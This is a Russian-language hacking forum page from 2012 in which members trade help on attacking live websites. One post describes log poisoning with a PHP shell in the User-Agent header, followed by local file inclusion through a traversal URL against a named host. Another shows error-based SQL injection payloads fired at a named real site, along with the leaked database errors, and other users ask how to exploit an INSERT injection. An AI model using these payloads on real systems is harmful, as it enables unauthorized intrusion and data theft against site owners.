HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2083 из 2422 « Первая < 10831583198320332073 2079 2080 2081 2082 2083 2084 2085 2086 2087 209321332183 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.08.2012, 02:23
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
to Testosteron

Если вкратце, то например вставляете в поле User-Agent мини шелл (например ), вызываете ошибку, данные записываются в error.log, дальше вы инклудите этот файл (если конечно нашли его месторасположение на сервере) и дальше работаете с ним "http://macrohosting.ru/?file=../../../../var/logs/error.log&e=phpinfo();"

UPD. Можете прочитать тут по этому поводу...

Да и не забудьте проверить wrappers!
 
Ответить с цитированием

  #2  
Старый 05.08.2012, 02:46
VictorBruc
Новичок
Регистрация: 12.04.2026
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию
Ага понятно. Спасибо за помощь)

Пошёл изучать
 
Ответить с цитированием

  #3  
Старый 05.08.2012, 17:03
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457

Репутация: -10
По умолчанию
Подскажите где можна почитать о sql ?Как что подставлять.
 
Ответить с цитированием

  #4  
Старый 05.08.2012, 17:20
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
По умолчанию
2Sat-hacker прочитать можно про скуль почти от А до Я на крупном хек сайте /

Ваш КЭП!
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #5  
Старый 05.08.2012, 17:44
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457

Репутация: -10
По умолчанию
shell_c0de а ссылочку на от а до я можна не могу найти.
 
Ответить с цитированием

  #6  
Старый 05.08.2012, 17:59
K800
Флудер
Регистрация: 25.12.2010
Сообщений: 2,173
Провел на форуме:
697724

Репутация: 372


По умолчанию
/thread43966.html
 
Ответить с цитированием

  #7  
Старый 05.08.2012, 22:29
Gaben7
Участник форума
Регистрация: 08.01.2012
Сообщений: 129
Провел на форуме:
28549

Репутация: 6
По умолчанию
www.bondware.com

помогите плз со скулей, версия '5.0.77-log'но таблицы не хочет выводить

/?1'or(select*from(select(name_const(version(),1)), na me_const(version(),1))a)and(1)='1

Цитата:
Сообщение от None  
MySQL error: Duplicate column name '5.0.77-log', occured in query: "insert into bw30_tracking set ip = '235.25.206.61', referrer = '', page = '/index.php?1'or(select*from(select(name_const(versi on(),1)),name_const(version(),1))a)and(1)='1', date_visited = NOW(), user_agent = 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)', session = '068o5fjspb9abulhecd9rnrrt3', host = '235.25.206.61'".
побывал так

Код:
1'or(select+1+from(select+count(*),concat((select+ table_name+from+information_schema.tables+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tabl es+g  roup+by+x)a)and(1)='1
Цитата:
Сообщение от None  
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from(select+count(*),concat((select+table_name+fr om+information_schema.tables+li' at line 4, occured in query: "insert into bw30_tracking set ip = '235.25.206.61', referrer = '', page = '/index.php?1'or(select+1+from(select+count(*),conca t((select+table_name+from+information_schema.table s+limit+0,1),floor(rand(0)*2))x+from+information_s chema.tabl%20es+group+by+x)a)and(1)='1', date_visited = NOW(), user_agent = 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)', session = '068o5fjspb9abulhecd9rnrrt3', host = '235.25.206.61'".
если так

Код:
/?1'or(select/**/1/**/from(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.columns/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.columns/**/group/**/by/**/x)a)and(1)='1
Цитата:
Сообщение от None  
MySQL error: Duplicate entry '
CHARACTER_SETS1
' for key 1, occured in query: "insert into bw30_tracking set ip = '84.109.214.211', referrer = '', page = 'http://www.bondware.com/index.php?1'or(select/**/1/**/from(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.columns/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.columns/**/group/**/by/**/x)a)and(1)='1', date_visited = NOW(), user_agent = 'Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/10.0.1', session = 'r891pk3kpk3u6us67e2ppt7e22', host = 'bzq-84-109-214-211.red.bezeqint.net'".
то, что жирненькое, таблица limit 0,1
 
Ответить с цитированием

  #8  
Старый 06.08.2012, 00:52
smirk
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
Провел на форуме:
45774

Репутация: 26
По умолчанию
2Gaben7, чем тебе еще помочь? на рдоте те уже и так все сделали...

лимиты крути.
 
Ответить с цитированием

  #9  
Старый 06.08.2012, 01:07
cipa21
Новичок
Регистрация: 09.04.2009
Сообщений: 8
Провел на форуме:
71852

Репутация: 0
По умолчанию
Товарищи Гуру-инъектры! Вобщем даже незнаю как вам на пальцах объяснить....

В скрипте запрос записывает данные, которые вписал юзер из формы, в БД.

Код:
INSERT INTO servers(map,ip,port,status) VALUES ($map,$ip,$port,$status);
Когда в поле ввожу одинарную ковычку, то при отправке формы выскакивает ошибка на странице:

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '32', `map`='ggg', `status`='1' WHERE `ip`' at line 3"

Я в поля уже и select @@version тыкал, оно просто отображает это как текст. Даже не знаю что и делать

Может кто подскажет как это дело раскрутить до конца?
 
Ответить с цитированием

  #10  
Старый 06.08.2012, 02:05
apoclepsis
Новичок
Регистрация: 24.06.2010
Сообщений: 9
Провел на форуме:
1885

Репутация: 0
По умолчанию
всем привет! создаю сайт и параллельна изучаю sql. и натолкнулся на такую непонятку

на форумах везде проверки уязвимости ТИПА ?advanced=1`(при таком запросе у меня `-фильтруется), а вот при запросе ?`dvanced=1 страница немного видоизменяется

может ли это являтся уязвимостью и как проверить? проверка стандартным запросом - тоесть запрос после ?advanced=1. Типа ?advanced=1 union select... или же здесь запрос нужно вставлять между ? и advanced=1
 
Ответить с цитированием
Ответ
Страница 2083 из 2422 « Первая < 10831583198320332073 2079 2080 2081 2082 2083 2084 2085 2086 2087 209321332183 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.